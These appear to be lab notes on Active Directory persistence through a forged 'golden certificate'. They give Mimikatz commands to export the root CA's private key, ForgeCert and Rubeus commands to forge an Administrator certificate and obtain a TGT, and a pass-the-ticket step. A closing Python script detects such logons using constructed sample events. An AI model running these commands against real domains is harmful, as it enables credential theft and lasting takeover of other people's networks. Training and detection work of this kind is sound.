Persistence on the Domain

Step 1: Extract Root CA Certificate and Private Key

  1. Enumerate certificates in the local machine store:

    mimikatz # crypto::certificates /systemstore:local_machine

  2. Enable necessary privileges:

    mimikatz # privilege::debug

  3. Load cryptographic API for extraction:

    mimikatz # crypto::capi

  4. Export certificates (PFX and DER formats):

    mimikatz # crypto::certificates /systemstore:local_machine /export

Step 2: Generate Custom Certificates

Use ForgeCert to generate a certificate for persistence (the PFX files exported by Mimikatz in Step 1 are protected with the password mimikatz, which is why it appears below):

C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123

Step 3: Obtain a Ticket-Granting Ticket (TGT)

Use the generated certificate with Rubeus to request a TGT:

C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller>

Step 4: Use the TGT

Inject the TGT using Mimikatz:

mimikatz # kerberos::ptt administrator.kirbi
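Added here as a defender's check, not part of the original notes: a certificate forged in Step 2 is signed with the stolen CA key but never passes through the CA, so the serial number a domain controller records in event 4768 when that certificate is used for a TGT request (Step 3) does not appear in the CA's issued-certificate database. The 4768 records below, their simplified field layout and the issued-serial list are constructed sample data for this example.

```python
# Simplified text of Windows Security event 4768 (a Kerberos TGT was
# requested). These records are constructed sample data, not real logs.
# A TGT obtained with a certificate (PKINIT) logs Pre-Authentication
# Type 16 and a "Certificate Information" section naming the issuing CA
# and the certificate serial number.
SAMPLE_EVENTS = [
    "EventID: 4768\nAccount Name: bob\nSupplied Realm Name: za.tryhackme.loc\n"
    "Pre-Authentication Type: 2\nCertificate Issuer Name: \nCertificate Serial Number: \n",
    "EventID: 4768\nAccount Name: alice\nSupplied Realm Name: za.tryhackme.loc\n"
    "Pre-Authentication Type: 16\nCertificate Issuer Name: za-THMDC-CA\n"
    "Certificate Serial Number: 4F0000000A\n",
    "EventID: 4768\nAccount Name: Administrator\nSupplied Realm Name: za.tryhackme.loc\n"
    "Pre-Authentication Type: 16\nCertificate Issuer Name: za-THMDC-CA\n"
    "Certificate Serial Number: 7C3E91D2B05A4F18\n",
]

# Serial numbers the CA really issued. On a production CA this comes from
# the CA database (for example, certutil -view); here it is constructed.
ISSUED_SERIALS = {"4F0000000A", "4F0000000B"}

PKINIT = "16"  # Pre-Authentication Type 16 = PA-PK-AS-REQ (certificate logon)


def parse_event(text):
    """Turn the 'Field: value' lines of one event into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def find_unregistered_pkinit_logons(events, issued_serials):
    """Return (account, issuer, serial) for every certificate-based TGT
    request whose certificate serial is absent from the CA's issued list."""
    findings = []
    for raw in events:
        ev = parse_event(raw)
        if ev.get("EventID") != "4768" or ev.get("Pre-Authentication Type") != PKINIT:
            continue  # password or other pre-auth: not a certificate logon
        serial = ev.get("Certificate Serial Number", "").upper()
        if serial not in issued_serials:
            findings.append((ev["Account Name"], ev.get("Certificate Issuer Name", ""), serial))
    return findings


if __name__ == "__main__":
    for account, issuer, serial in find_unregistered_pkinit_logons(SAMPLE_EVENTS, ISSUED_SERIALS):
        print(f"ALERT: {account} got a TGT with unregistered certificate {serial} (issuer {issuer})")
```

Feeding real 4768 events in requires adapting parse_event to the exported format (XML or CSV), and the issued-serial set should be refreshed from the CA database regularly.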
